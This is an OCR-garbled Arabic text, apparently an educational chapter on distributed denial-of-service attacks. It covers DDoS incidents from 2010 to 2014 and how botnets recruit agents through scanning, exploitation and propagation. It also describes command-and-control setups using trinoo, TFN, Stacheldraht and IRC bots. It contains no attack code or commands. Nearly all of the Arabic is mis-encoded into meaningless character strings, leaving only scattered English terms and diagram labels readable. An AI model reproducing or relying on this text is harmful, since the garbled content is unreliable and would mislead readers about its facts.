jUsJI dilkl dip. botnet j^j^f*^ *jtr^ 166'000 ^ DDoS . V ^jjj^'j 

2010 * 

^ DDoS .u^jl^jj 

lJU^VI jlS ' J^lj^] jl s wUl djUV jll Jlft 3Jj^ Jja ^> UjUij] ^5 Aa <j| ^kjj 2010 j^j^ t^j£l (Stuxnet) ^ 
,4^a,t jll Jl (cyber-terrorism) J jj^V^ jV^ j .^^^1 f-^l j ^jj^^ ^W-^j^ J j*^^ 
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2011 * 

iCjIcLl-oII jz^f ^Ja Low Orbit Ion Cannon (LOIC) si J ^ Ij^i^L jjI jj* 28 f J ^ ^ 
.4_iLj^j3l cjlclL^allj Jaiili tilli J Iaj CjVI^JI jjc- J Jl^cl l^Jj t^jJ uij£ <jV jj 1 nunjj J UjLi 4£jJa3l . "Kochind.com" 

^LJl <Jj]axJ j Cjl Ala ^1 jaII (J^J^V dljjjjVl J^ UJ'^ (3 ^ J JQ^ (J^ (j-* 4 JJ» ui dili DDoS J^ LOIC 

jUi ^ c# ^ Oj^j t^Jajl Jc Jaxj tPraetox Technologies i> 6 j^j^ 

2012 * 

IiLijIj (jjJ ^taJI jjjj (> — ^ lP 3 ^*-" ^jS^I djUi^ki] 4jiiA\ q\ S i^L&ll cIjLjV jll S i^L&ll dLV jll ^ diajjcl 

toj^VI £JjLoiVI J JtSj .^a J?£^ J U J"* ; ^ fitixjJa £1a^J! (jlj <J>J^ Jl V J^J ^^11 <jj^j1| A-njj Jc DDoS djLaaJfc J j^j 

Jj djjl CjLft^Jl £>,JA .DDoS ^ CS^ 4 ^ ^ <J^-^> L>* S^l^ll 4_lfLjxiVI 4-ilLall LlLaljaJjAJl (J-»*J Clll^l jjJJJ^ll ^isU Lo£ 

,4i jJjoi-a jjc. <CjjoJIj ^^aJl O^J cAjj£j1I j>» ^ jjll 11a jl jJ^> J ,^!>Iasl!I jx» Jc CjLaJjkll (JjJaju jl JJ^j 

CjU^a jja*1I J <L DDoS stal "itsoknoproblembro" <<^j <jUaj J < *uv^ .. i t £>^*» DDoS dljj 

jLj" l^jfl Uj ajSjj^V) ajILJI cjLauuj^JI ^kjjal ^ t^ilcVI jjj^iii feaj .ajSjj^V) t*3 jjjII cAj$U Jllj ojjjSII DDoS 

"itsoknoproblembro" ^1 ^ ^ J° ^^Jl J^xj J ^ixJJI ^jj^l j! <iJ15 ^b n ^l jjj ^W-j^j^ 
.ft^j^aJlj 4^j^3I aIloJI 4Jc^U3! Cjl^aJI ^ dj^Ij s^j^JI DDoS ^ ^ ^ < ^ Defense.Net u^j^ uj^ 

^jJa (DDoS) (j^^>^^ CliUi^A jl^ajjai! q\j <clia Jc dill j La S laJLdll CIjUV j31 J ^jJjjjaixi ^jc j-<^^ ^JJ^J^ J^J^ 

2013 A 

cjLo^JI )(jju>i<ft jjc. j .jj^ jlaixi Jj cJj^j DDoS ^ cJ^^ tAjjl^JI J el ujI aja 300 jj^" DDoS ^Li^A 

^> J jVl L-L-ojII J ^jjIjII J CjjUUj-> 300 (JJ^ t"lUm SJjUll 

aj^uj jii ^Jj^.^ pUSi J^^Ji lP 3 *^ ilm^jd "Amazon.com ujj^" ^ v^ . n* l >«j jl^l ^2013 jj^I^ 

"^jjdjl j£ ^3 j>» jUjjIj .6j3 jILg jjc. ^jl Jj JjJjuJJ ^ ajuJ Cj9 J*^* f ^ - taJJ ^jLi^.Vl ^ a laJ Cilia 4^3 

^ jxJ] <£ j^JI jl Jj jjAj ^ill j Error 503 g3UJI J^^ 

Uakj ^^joaJJjll ( . UjuJI (jj^J U^^^^ L_llcr| Jj . J^Lobd ^1 <J>.I jJ Vj cJ^-^ cJ-^ 6 UJ ^ J -0 C? 1 ^^ <-d.laJl ^j j-a 'AW^S 

^jj^^ioixJI ^la« ^ J-<ixI3 ^ j-^^ .u^^ J^ j - ^^ f c?^ ^ j j 'DDoS f 503 

t . ujoj jluij (jjjLil 4_ixijajj cjL^jjj^j ^1 J^ j n 1 flj 45 -Jl '^j^ ^ L ,J * J 6 ^>f^^ <jIj^ ^UjI 

2014 

'NTP Amplification ? JJ ^ j^JI ^ J jjj^I jaAI 11a iaii jjj t^ixjll j J jajII J DDoS j^ 1 ^ 
U ^^LkJ I^Loj jjlj jSaj ijj jj^IVI ^1 jaJI dillii^j ^> j^c jjj £*aJ! .1 jUjj! jSSVl DA^S Reflection j 'Syw Flood 

.smokescreen 

Jl jo AjlftVl J jlai] 4£jj^3 jjjii ( flj^ d-ua .2014 J^t JJP jaI) "4-4±aJ| ^ L)^J^'" ^^JW 

diauJa jl j .2013 ^ s j^>Vl j^ <£j> j^Jl t (DDoS Attacks)^^ 1j >^> 3i jj^l t"4^^aJI ^> jUj^JI" cjU^a 

2013 ^ c> t^jJI cja^j Igil ^ jUj^JI" CjU^J ^ l gull J jLJ Sjfl jA\ i<£ijJi\ Prolexic 

djtajjJaj" q\ jJjaj* J 4<^jjoi3I dialjJalj .^Ld^Jl j-d jUij^Jl ClaLaaA *Li^. jlil 3 > <a1 ^ dlflJiiaJ jjc J^ cJ^^ *Utfljl! 6 j^J>.VI laJLujI 

Axl\ <!Hi3l Sjf^Vl j^ <^J> j^ll "^^Jl c> jUj^Jl" CjU^A AjI jjj jl Prolexic jj j JUI J cijj j^J( jIj^I JJ 

cIjLi^A jjI jj JJ 4^jjoJI CjjLailj .IjjixJ JJ^I a^jI ^ (J*^- J 6<jj^ljl3l ;CjIa^JI <illj* J ^Jlajll 6j^j>.VI ^Ijj^JjojI jcLoij jlj t^jL^Jl 

^> <jo jjII tSllS CjjIjjI ^^jJaUJI ^UJI j^ Jala jll ^jl! J!^lk jl d-ua t2013 ^ c^Wj "<-«^JI jUj^JI" 
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^alc (j* jj^-^ 4-*^ <Jjl cJ^-^- Iaa^j Jll djL^gJ! (j* AjUJU 87 u^j '^^l J ciujl aaa 2.64 diiL <La,iaJI (j* (jLa^aJI 

."(Jj^Jjlj Jj^jl" ^ AIjLoJ <jojIj^ L-jjoiai tilli j 66,1^.1 J <C.Lal (j-G Cj^JjojI 2013 

jixj cillij <"Bitstamp ^^V' jj* '"Bitcoin ul£V' ^ jll 4^*^ J cijUL^ *135121 cia jj 42104 jj! 12 

Jjtjj CjU^jjJ (_£^j <^J ^''L^llaalij" ClilUij ."DDoS ^ * ^ ^ (jx» (jLa^aJl" _J ^^XJ La Cjl ^^-j ^ (J^-^Jl ^aUaill (jla^su 

<j^aLaJ) \ glhq^ a <Jj3 (j-a "Al±u\ \\a JJC- ^ullj" -1L 1 ^> j La ^ ja. j L_flLuu£l Asu 1 Jc L_LauaJl Clia jl Igil 6^31x11 <J ja. "^jJjSJuj" 

ttgJ IjLa UiiS jLoj (j* AaJJ jll "t ^Ujoluj" ^)flsu j .<Ld,laJl (j-a ^jLo^p* CjLaaJb Aj (^ill J-<^ J <1asl!Ij 
Axj <^H^j cA-LJal all A Llflll (»LVI (JjjJaC- ^9 "(jjjSklij" (j-a Lg-j^LaC L-lauuj I fll flit J ^a jfli ;"(jij£kiij" 4_LaC (Jjl^il 4_j^^)jj 

.t^ja^Vl ^ L-LauuJi CjULc; 44jjLLII "Mt. GOX 



^lab "^jijSjii" L-L^juj 4_iLaC ^jLu ^JJjuj <il "til jj> njV ala.VI (Jj^al jill £3 ^ (3^^ 4_j^aLaJl 1 ^*^Q^ - ^ is^ 0 " L 



<£jjoi Ja£a JjIajj l^jl Vj t jjjJI jl jV j^ll c5^>^^^ Cj!>Iasl!Ij l^ljjlLa (j^-dj a^<^j aIgc ^jc ojUc "(jjj^jj" (j! j^ij 
^lill CjUUjI Jj^ SjIjJI cjUij^l l£ Shaftj 'Stacheldraht 'Tribe Flood Network <trinoo 



(^j94^ ^ M^) How Attacks Are Waged 10.4 



'DDoS ^j^-^ .6jUj>>ill sUa j IRC-based command j> l!^ jII/^JU-aII ajlu Loj ^l,^ nub t^Sli ^jjj ,<ajaiio <Ljiaj 

/ alia a L_fllAAl AjJa 4j3 l_j jC. j-<JI J^-^ J^ il J-o a^C- ^La^lg.*] I^I^JjujI 



tment Of The Agent Network) *5t*jM (> ***** 



cecruitmen 

trinoo tAij^ll DDoS ^ ^jVUJI J .lUISHj (automated) ^ J yi ji ^jj^ ^1 lA^j .f 

CjVI aja^j] (Scanning) (j^ail! ^\ i^LJ J^ jl t J^l^lU ^Jl <Ljiaj ^uIaslII ^^jV ^llij (scripts) ^ill jJI uj^^'".? 
<jjj .(Bagle-infected hosts J 'MyDoom 'Slammer ^ JliJI J^ u A^ O e ^ J 1 ^^ j <fj*^all 

alia a AlllL (jial JC-V taa»V l^l^ajjajl ^aJJ jll dj CjI£jjuj ^.UJ > st^W A U AjjJajl (JjlaJ 4_a.| (jl^J^ll (J^axJ ^al^luil ^ jl^ll (j-Q 

j^J J jj^a^xJ! dj jill I jh^^lj (jl J^jVl J^ ^-jli tSJ j^ll (jjiiLJaxJl ia^^J ^al lij .DDoS ^ J ^ 



https://www.facebook.com/tibea2004 
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(FINDING VULNERABLE MACHINES) fav ^i ^ t ctf i <je jjkit 



L_LtIa jj J 4ilj t^jlxJl ^.llaauj .(jjljlkVI A \ » "j t fl«jJa Jallj dlli ^1) CliV jUj* ^J^J* ^ g i£ aJ ^^jII CjWI Jc- jjJslU ^ll^J ^.l^ll 

(jjSJjJaxJl (j-a (jjj!>L<J! <C a ^> S.J j^. j-a 6.JA .jjAslII ;Ja^Jl £ jjoJ .t^jjtjA-a £ J^J *&^)^J J^J J 1 ^ CllVVI 

.dijjiiyi Jc 

cjLouoj^xJIj CjU^UJI J Ia£a Jlc c£^jj <jUaj djli cjVL^I ( j r iijjJaJI Jc jj^t ^ <DDoS 0* Jj^ J 

jg > oJ 1] IgjJa^xJ (j^-aJ l^-ji 6 *SU^ (J^J ^ ^ J^ O -0 ^ (J C5^~^ cJ UJ^ W^'J ^ J 

AjjUjI! jU^bU <c jjoJI JU]| l_jj jjjVI Cjli (DSL) ^ Jl ^ jl^l JaaJl J JA^ ^ S jj>V( 4-iJ*JJ! .o^V*^ ^ <> 
jl^J ^^ill (jjiLJa-all <C j<^ a ^ I^A £juj j ,j3 j ,L_u£-<Jl j <J^1a3! (j-a ( : ^ Jl <*->VIj^jI 1 1 ll^ J^)l<Jl ^l>laJLujVl j 

DDoS j J ( . iV>l I,ja j .DDoS cJ^ (j-o d qjh jiill aJIIg l_aI,jaI ^a j jI^jjuAj <J-g*j j j.<u.>.a^ <JL^j*l Ia jjs jj j <ikj 
^ j£ Iajjj jj (JjjLujI djli (jj^j> ^i^l Jc- ( . J ciijl£ CjI j^VI s^ja .DDoS ^ J jjjjtlll J! ^ill j ^jjLu^JI 
Aiftl ^llj ^Knight botj Kaiten ^cjVUII .Windows s^xJI J^ ^JUJI J Sj^Vl DDoS 

.(Cygwin portable library) ^ j^^ l u^^s^ ^1.^ unb <iaLouj qAjJ aJj^VI ^1 j^VI 

Jj ^j^Jl o^*-? J^jj ^W^^ scanning Jtill J£xi3l ^jjajj .scanning Sj^VI d^JI aA^c Jc; Jiaj 

.jtpll ^U^al J jL^j ^l^JI jli j*Vt jl£ lij .c j SUaJ! Jc^ jl£ lij U Ai^<J jUa^ll lJ^JI 

Stepping stone 
Attacker - 



\ Stepping stone 




Command/control traffic 
- — Scan traffic 

jj Exploited desktop (recruit) 



scanning 



^L,U ^l^all l^j^ ajj^j <jL^ ajI^II J Scanning 
. jl^l j "(blended threats) aLIilJI CjI^^II" t*Ui J^ .ajjISIs ciik^ j ^ jjjJ! ^^31 j 
J tdjU^kJI ^ ^jaxJI ja jj fj2S\ jj3I ^ j^-« jl <j^j3 ^Ijj ^jc ojUc; {blended threats) cIjI^j^jII 

daLiai j tcijlj jj <iaLauj jl a_l<JIsl!I a£jjoJI l_jIj jjjj jl 4-^j3^ djlij jjjj L -^^>*^ j ("rcbot" ^-<^ (j-o 4 Vi ui bot 

lA^iij j-dl jVI Jjuj^joJI .IRC J ^ Jjuj^juJI (J^asu Jl JajjJ 4(JJJ^a3I c fljjJa^ll Jc AjilaJi J cJaxJ 'l!^^*^^ 

Jjijj jl t(nCtblOCk) (jJjUc 4_Sj£ ^juj-dj ;^^Jjoia13 oUall JxjouJI diUjil ^Uacjj tlRC ftUS Jj (j^akjuj S jCJ JLd tdj jj ^Lx»lj^)J 

ajjUjII aJl& J^U> ^ t*Ui j 6 power tdjUa^jJt ^ J Netblock Scan ^^j ^ j . ji^JI ^^Jl t ^ j^a 
Jj 192.168.0.0 (> ^ JS Js ^ 192.168 cJ^- J^) jj^ ^ J jVl ^ jl 

^ j) botnet ^1^1^^ ^W^^ £^j ^jii tj j^i^niol l u j^ > ?n ^ J^ ^ ^ J j^ 1 ^ ^ .(192.168.255.255 

^jjflJjJaAll IgJ <Lajli3! Jj i *u>\\j c aL&li jbjlaib ^ajflJ ^.I^aII .(IRC J J^ 3 ^ J^^ lS^^ L>^ ^J^>^ <J-dl3^ ^* j^j Jll J fto^ L>^ 
j^-!l A£jjoi (Jj£ ujj o^lcj JIjIUj t^listjJall ^jjiljJa^Jl ^ja Aj^jV Q^JCj ^jJflJjJa-<Jl 5-VjA UjUIj c fll > >i1 ^cxil^)j3l (J^asu ^listjJall 
Jc) c . UjuJ ^jJal j cJ^^ J^JJ^-i ^^>^-AJ m QAXL^\ $ *\\\ Jj3 ^1 lS^*^ uW^ 1 ^^ (J^H J ^a^ill Jj£ J^f^ . J^^^^ 



https://www.facebook.com/tibea2004 
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Cj\£jj^3I tilt ^ "lJ^JI ajjxJI cAi^H" jjiiij ^ cjU^UJIj DSL JjS ^ 4£ jLuJI netblocks * J^51 

. JS^I IRC bot scanning ^ .Ajk^ ^UjJI ^ ^ill <(Phatbot 



Stepping stone \ 
Attacker + > 



IRC 

server 



IRC 

server 



g Bot 




— Command/control traffic 

Scan traffic 

Exploited desktop (recruit) 

ciij y^i\ .{Internet worms) ^ ^ j* j u ji^^ .ipaJSl <j-a^i3l ^ ^. v^un y±\ jj 

cJ^) dj^joj jj^ll 3JjUui <Ljiaj cAiscjjall cAijjaxJI ^ j^nn ^jll j <JI ^c-J ^.L^L ^ j^j (Internet worms) 

^iltj ^exploitation (2) ^ ^ > ^ 1 cjVI d^all Scanning (1) ajjJ-J ^Uij t^J s^jJl .(I jjj&Yl 

L_ajUaj (j-<» (J^asu ^jjQ^*^ Jjjl^xJl jlfr^J) ^^Ic 4 L» ujJ ^aJJ J j£) payload (3) J ~^*^ diaJ CjVI £jJaJj CjVI (jljl^U 

^aUaj <jjj£-<» jl oj^lill ^k) s^jJ! <^joij ^^>^ uj-^ u^** (payload) ^ .l£^>^^ ^ £ ... 1 ^ ^5-^ ^ ^ 1 



Attacker 



Stepping stone 



Cornrnand/control traffic 

— Scan traffic 

Exploited desktop (recruit) 




Desktop 



Desktop 



Desktop 



https://www.facebook.com/tibea2004 
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^^LaC lllaJil jld A))f ui 4_Ljaij <^A dljjljyi (jl^P .djliLJl ^aUaj J IgJ-LaaJ ^aJJ jll £Lx*l^)iJl (j-G 4_L»l£ <C a (jj^J ^ jl t^dlliLoJl 

.6^ j^ll jL&ul JU1I JUJI ^jJajJj .^J^SJ DDoS ^IjSI (> I ^j^ll A] jxa. (>jJaJJ c*Uil <DDoS 

.<jja Sjp gljaluAj ^j^^att ^jjjUxi) jUaj (jtJjilt 

*<y*\ 4_JUij j^aU tL-it^AbU ( IPv4u^j^ ^I^jLujI <1U> J) IP <jt ^ dij 32 l£1 Jl j^».ll jLl^VI .UjI JJ^ 

Jl .0.0 jlj^l A 6 IPul Cy* cs-^j^l ^—yW 16 j> 8 j^-^ * ^1 j j ^ c - \p\ j j ^ iC * 6 j^-^I J^ u^j^*-^ (j^-^ Cy >u ^ 

.AaJj <«— ^J J tdjl^JjoJl (j-a <C a jl tS^aJj Cjl^ijuj ^a^il ^ . l^A (jl jixll (jUaj J .255.255 

^jJa* J-i> afllll j all J ^a j£j ^aJ (jAj 'Vl.lJC.Vl t a^l..^" jj| <£jjj| <Jj£ ^ SjJxj^a <LojUi ikL . (hitHst) ^ laVluJ J 

JJ^J (jC !>Liaa 4 (J^-^ J^*^ .(j-aVI J jl (jj-ojJa-all (JjSS (jl Jfl ^ jll (jJjUxlI (jUaj J JaL^j 

.^La^Vlm^ JJC. (jJjUc CjlSUaj (j^na^Al £jt_jJall difl jll 

(C jlaj jllj 4-SVI J (J? i nil L_aLa jc i— La y o^j^ll (jli t jlfraJI AJu^\ .lie .L-jl uaj<JI jl^aJl Je ja* jaII CjL* jLlaII ^l^aJLuAj 
^£1 jx» (jjjUc Jc 'J^ j'^J ^ij^lxi (J^^ 'J^l^ C-l^f^ (_5-^ .^aaill (jjjlic (jC Cll^JJj ( Jj - gal 9jll J CjVIj^jVI JaLaU 

.(^1 J^i) SSH t> Jl^VI cjI^j u^j^ ^j 1 ^ known_hosts '-^j <l 

4_ijl!ill AjjIj CIjVI (Jj^^ 4-ii> 4 a i nJ ^j! ^jiajjij _l^J jl j>i Ja^j jLaajl ( . UjudJ 4_j\JtAl <c jjoij Cjjjaajl ^jl^j^ll 

A q a/^j^^^W lJ^-g-^ ^ 6 U^^^^ L>^ .^^^A 3 ^ ^--^J^V^ ^11 *^ j^ll ^cjoij j <jLj^a1I oj^-VI 

Ullc. ^jl^J^ll (jl Jjjjujj ^tJjUll /o^j^ll jLaiijl ^l^ljl Asu Ai^JjaboJlj oAaxIaII CjLo^JI Ajj-oJl liiill iajjli (j\ CjVI (^^Jc j laJ \ c^ill 
j.<U.>.>iJ A3 c^djjijVl ^ j^. Jl jj V [CO(l€ R€(l) r ^ ^ o^Luillj (JJjl - ga^oJI ^iiLJa^ll tJUxJl J^f^ ^5^*) Ifri-llajj ^aJJ V 

lC f A L M JJC. ci^-V DDoS AjL^a^ll 6 j^VI c>asu 

(Breaking Into Vulnerable Machines) ^i^aJI Sj^aVI ^UjSI 

. jl^aJt "til!)\j>il" jUSuj liA L_S jjoj .^ll) J jj^a jll (J^-' (j* ^ (,5-^^ CjVVI J c <!■> > ^ <Jalj J^lxlajV ^I^aII 

*\ lalll djl^l^cj j) CjULJI jjj*j/c_flia./AiLu^j (j^j t J lalll (5jbVl J jj^a jll (Jj-^I^aII j3 jj t fl» - gaJt JaUj ^ ^^xJaxll ^JilUtll 

.^IjVI 

Exploits typically follow a vulnerability ) <-i*^aJI ialiS jSL* Sjjj ^ o-Uil J^l (> it 

.(exploitation cycle 

J ^ ^ <L^)IaJ l^l!>lijjaj| i^^y^Jj g aII ^)jlj^ J *^^>*^ ^— flljau^l -1 

.£jujjI (jUaj Jc l^J^lstlajl J - 6^)jIa1I oiA 2* jLk L_flJtjJall Jalij ~2 

.cjIj^VI £>1a ^al^klajU (jj^jii [script kiddies) j^^j ^aJVI CjIj^I -3 

.l^jjiiaJ Jc (Jj^a^Jj olA L-kx-jJall Jalaj Jc ^Ljakll 1 gajll hj ~4 

# L_astjJall Jalaj Jc *LojlaJ! JjUJl J^^J ^j'^ Q ^ ^aJJ ^aJ (j-«J ~5 

^ i^luii ^Ui DDoS J^' CH 3 *^ DDoS J 1^!>UjjuAj a^I^qJI ^ jL jl ftAaJ j L_axjJall Jallj AJ^aJ ^aJJ jl ^ja^cj 

.(propagation vectors) jl^VI dj^iU 1^31 jUIj U U116 j .4ilxuJI CjVI (>» aj^xII Jl 6^1 jSI jj^j ^ djl^sull ^ ajaxII 

Cy* jj^kVI (jjiA^l^ll ^1<J tilli j . jlg-aJl ^al^jal Asu IgJ^UcLuAj ^IS (_^ill L_astjJall Jallj ^Jai > ^.I^aII ^ajL 6 ^jUakVI (j-« J 
^AiJ ^jLi ^.I^aII jli 6(jAauiH J Jjjlk-cJl jl^aJl Jj <1 jj^ j (Jjg > ull .cJ^ jll ^Jl Jc- 6 JaJjuoll Jc ^!>LiLajVI j <L Jail (jjaiL ^J jj^ jll 

(J^lk j^ ^J jj^ jll .backdoor ^^^^^^ I-^a ^<u.ujj .(j^« Jc- *^jl jll <JU^jVI jl ^ ^-<u.>.>ij (_^i3l ^l^U^JI ^I^jLujI 
. (JL^aul t . ilia (_^V ( ; u^Lujj L_a jjujj cl^jcljj^xi Jc jiiixi (_£^>aJ CjVI^. Jj '^jj^ jjj-* <Jajoj| jj ULi^.1 ^ o backdoor 

'(Mended threats) ^ jj^^ djl^j^ill (jiasu l ^U n . n Jll j tCjKj^ ^alll JjS j^ l^ic c ajiaall ^jj ^1 Jll c axjJall Jallj j-a 6^.1 j 
6^A JjuoII CjI L_JJ^)aJ <1 jLswa j JjuLoJI JjoiII CjI j-<i ^Lojla Jc ^ j^aJ (Exploit) O^ 3 *^ .<i;ixjJall JjJ-^ll ^ jA j 

t ■ UjoLjj 4_Laili3l <J jak^ll JjiauoaJ ^aUaj ^j^ ULia^l jjLsuj I^A .^a^VI jlj l^aJ j tojj^ld <LjaJ jl (brute-farce) A.a.£\\.*1\ S jlll 
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^jjc. 4_IaJjau3! CjLaI^II (J^asu j! "^)juJI *LaK" £y jl ;(J jist-a (JjjjouJI L_jL (.f-^ JJ^>^ ^ ,>^J ^jfi UJ ^ 

(MALWARE PROPAGATION METHODS) j^! J> 

jl (central repository) isj^j* £^ j& ^ SjLiall ^1 jJI ciufd jUiajVl jIj^j jl j£ iUJV 

^ jl (FTP ^lS^^ cJ^f^ cs-^-) ^Aii*JI jiaixi ^ cjL^g^JI ^j^j ^i^-all ^jl !^-^l j '(cache) ^—^j-* 
£>i& ^ ^IaaII (caching model) £jS>JI oO*^ S^lj Sj^ j^xJI 11a ^Ij^Vl J j*Vn ^li c qj > >>^ J£j 



central-source 



2 - copy code 



V 



attacker 



victim 



next- victims 



1 - exploit 



3 - repeat 



^ ~ ikiLujj <^^j shaft j trinoo L . j'v uj^t^ <s ^ .W-^ j]j ^ j<s * >i j <— ^O^j - ^ CjIco jiuixJI 

Jxi U£ jj j^ill 6j£li3 Jjl^ill Sj^i* ^a! W32/Leaves '2001 ^ ^ jVl ^LjVl ^ li* 

.gO* ^ jlo^l ^ .2003 W32/SoBig ^jJi 

^cjjajjj .4i^^UI CjVV ^ tij^^ c qj > >>^ <j| j^l lU^j ^l^Jl ^-u^ 6^-^^ 'pull j> 'back-chaining j& j 

.back-chaining c^^^ 
liA £jj (jjill .s^lj J^Ul^Vlj jU^VI forward propagation J 'push 'autonomous ^ 6, J^ 

citti ^ <^uaij ^1 j^j V^j ^^Jl ^j^i j^ii s ^Ij^VI ^ iSj^. (exploit) 6acA: chaining^ 



JjS (NOOP j*\J c> Al-iLi S'the buffer overflow" ^>J1 j JjW^ 6 C5^) 

.(autonomous propagation) 



attacker 




victim 






1 - exploit Si copy code 





2 » repeat 



next-victims 




(Controlling The DDoS Agent Network) lhj^ ^ J 



4 https://www.facebook.com/tibea2004 
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'Tribe Flood Network (TFN) <trinoo J* ^ Uj Sja** ^jV gr*^ 1 j^V 1 ^ **** ^ ^ 

ojii— -II <> 400'000 ^jj U s j^S Phatbot .IRC L^J j\£ 

http://www.securityfocus.com/news/8573 . 



(DIRECT COMMANDS) Sj-A^l j-tjSfl 
j^l jVI jt-^a] (S^^ ^^j^l fO^g ^1 ^^jj c— ^lS^ j3I/^JU-a3I f.Lkj ^ j£i trinoo DDoS ^ 

<j^aj (j-a (JjSjj (jl <j£-<uJl j-gI jVl jll J] (Aili^xi j-al jl <C j<^ <^ ^Ia^ILuAj UL^I jj j^l jVI Jib ^ajflJ 6jj^J (_£ill j 6£tllx-all 

Qli SjiaAjudll Jj^a i^j^j ^)-aljVI cJ^ 2 ^ . L — ^ (J JUt ^ JUJ -^ **^) C5^~^ J' (J^aAc- (J^aj ;(^jJalj) jLuLa jjc. 

j& t^j l SjAjuj jl SjLJaSI ^c^l jJI Aiili Jl <J jll ^ uj^ CjIj^VI CjIj^S ^jc Sj£a ^ laau ^ji (j^j jllj CjL^JIslxJI 

otjuc Ai j*^ glU^ll Jc <jla I Aia. Jaxj ^£1 (.shaft 'Stacheldraht 'trinoo cjIj^I <*^Ij cjUJUJI J^l 
( . i^j *5l£ jll j tl^a ^lUxll IP jl jjc (j^jJaj as DDoS ^ .^-o^' J fUajlt Jj*j^j SjIc] axj J^ "U j ^^l£ jll 

C5 Ic ialiaJ) (j-Q ^JIslaII 4 laiaJ ^ill L_kLill ^ ^5l£ jll ^ Jalil^VI ^alj .^Insu Aic ^IU-aII JJJ^J ^J^flJ ^ilc 

jjj^ jl^a. ^1 gSljll ^) jlU^J! (authentication) <a^l^» jjSj V ^cjVUJI .DDoS Jj^ CjUjkx» 

'Stacheldraht 'TFN 'trinoo c> Cj^likjll m ^jl U^j^ ^j t^j^ ^^£j >aljVl Jl^jj 

DDoS ^-jIa^a diLi ojiajjaJI jl t-L ui Sll ^1 j ^^£jllj cjUJU^II ^ ^1 (jjlall I jj^ 3 ' mstream j 

^ j^-V DDoS C5 ic ojlajjoil] I jSjj^jj (jj^^l ^1 .IRC ^ A-j^Lo j S^Ujuj JjISj ^jj^j CjIcIa^. ^jjj Sj^j^ 

j^.! ui (J^J dJjuJj! S jjjuLa JJC- ^JLujj laajL (JJ^^l $ 4(JlL<J! (JjiJjuJ ^^^^C _^j^.Ij jl <LjiaJ ^ ^ a JJC- l^J] (J J^ J^i (jl 

j-dl jl jIAj^I ^31^^13 (j^-dJ J) .cilli cJ^jj *^lclj <JLujj3I <J jl^. (J^asu cJ^'^ (JJ^a (jC Ajoiij J^IslSI 11a ^^^ic 6j !n Jul 11 aj^ 

6 jjoJI t <1 /sK ^1 jaJLujI J ^JIslxJI Asu ^jc J jA-^a jl! 4_jLa^j eJ £i jll/glUJI ajL ^^lun ^1 DDoS £j! j^^ 

^jVI CjL^Jlst-xJI ,A£jjjauJI jIjjojVI ^Ia^jjuAj jjjjujjll jl jjuJI ( ** >1 J^lk j3I/^JIslxJI cjVIj^jI ^^<^ cJj^-^ u^v^j 

jllj CjL^JIjlxJI ^jjj ^jjjJ (j^3j 4£t]lx-<J!j ^\ $ A\ qi* sUS jjq-^ Stacheldraht c5^>^^ <«— ilj^l .^Jlx-<J3 4_loi£jl!I 

b Jill] <Lla tdiVl^Jl ^ 6djl^ j 1 g t yVi o^-^ cjLaJlx a\\ di^jj^l cciia jll jj^ ^ 
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AiLjaJjoal £3 j^a (j*j (J^ jll AiLjalLuil £3 jx» (j>» 4_ijj>JI JJ^>*ll ^^>^- f £ ^ J ^J^J'"^ ^ a 1 ^ Jj U£^-^ UJ^ '' 

Illustration of control traffic seen from site hosting agents 




Command/control traffic 
Victim DoS traffic 

Illustration of control traffic seen from site hosting a handler 



Slepping slone 




Aglnt Agtnt Agent Agent t 

r=n n D D r=n 



Agen t i , , i f?^=ii fl 9 en T 

p g a a p -i Command/control traffic 



(INDIRECT COMMANDS) 

jll 3JT 4 jUa.Vl c> yij 4"ajj^!" jll h^i pj85 c^JUJI jV .(j^^ll £jLjLJI <j^j j^M CjVL^VI 
4iilli f^lc 6 jilc .l^L^U DDoS l-a^xjII (j^j Ajli ^j'qq^ &1I Jja ^ ill C5 ic (jiajill ^j^-aj t^cllsLxJI <jj& (jjj^i 1 soc- 

ial* ^ Wi?Vl ill Jj^al jSlI sUi I^jj ^ill ^iL J^) CjUiUi ^ siLAll CjI^VI ^ jj SjaSLaII CjVL^jVI JaUji CA£ 

j .^/^Vl jjh'lll (jl jic -li^J 1 g ^ 4<ia£iLJl (JjLojjII (jc (J^'kMl j djl£djudli ^gJxjuLo <Jj3 (j-a <1 jg > nj 1 g*lh^!>La (j£*J ^^ill j 4^(jlaxilc. 

6 j^l jlkA\ iat_L<JI i^iil^>* J^Lk (j* cilli j 4(JjLuj^)U ^Ja^ij c*1Ua (jfL ^1 jl C5 1^. ^lIU-aJI jl Jj£ jll CjUIac c g t *^ ^^ic Sj^ta 

11a nj jVI JjLujjII Jl ffimV "^jjj^U" ( J?J CjUJUJI j jll J£ t^LJI JL^jVI yi . jjkj^l 

^j^lkJI j AaJU.Jl <a jjLJI djUUI DDoS ^ ^y^j tjnn ^ill C5 luaVl J;£ jII/^IslJI jl£ 

^ til3i£ j 1<A*C Ji3 j^iJl diULJl ^ J l^J (jn^jVo&jj djljl^j^aj ^ ^jAxJI jll j ^lUxlt ^ TCP ^-iVl^ajV 

(jl Asu ^!^j AiLjal ^Ic ftj^lS (jj^J (jl (jC jJJ iiaLaUJ DDoS ^— (J^*^ u!^ 4^j^aJl d^A clA^ J 3 .'^ Jal ^ cJ^J^l^ 

a £ jajoiaII ^aJl ^Jbj 

(jialjC-V CjIj jill (j-a Jjtillj I jxli J 'IRC ^5^* ^J^*^ C-P 3 ^ J^J^ DDoS ^ J^^ (j-« ^Axll ILd 

>CJ Ajjj iJ^V X^al jia iKaiten hot ^ VIS* jl£ . L >a^i3lj DDoS IRC bots ^ 'l£ 

(j>» ^^Ic 6^jl jll CjVIj^J^I ^-<U>.>iJ iS^ 2^^^ (Jjxjaij (j-d V^ .POWCV bot jj^J (J^^-^^ll ^Uaj Aliil j^.1 (JUa 

J Ujj . j^I IRC c^' lSS* IRC ^ l?^ -^J^ jk ^W^^ j (r/i^ bot) DDoS j c> jla t^L^l^ll 
iLjjudj Slifl (Jjjia (j^ ^IIslJI jj^ c_ixl .siLSll cjI^VI (jl^j V DDoS ^jVU^jI jli - cjVI^jI SUSS IRC gSt 

(jl^AJ ^ixiil aJ\ iaijjJ L— Lia ;Cj jJ AjjJaljjal SUS (illiA (jj^J U» S^lc . Jj^>*ll ^*Kj ^ ^ a (jj^J U» Ullc. 4JRC 
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SUS J Cj jj j j^-j • J ^>^ AJ .^SjJaJI t^&i Ujjili (jS^j 'IRC ^>jo <J^> tjiiill SUS .^S^all SUS Jl Cj jj jiaj ^j* .AJUll aS^aII SUa 

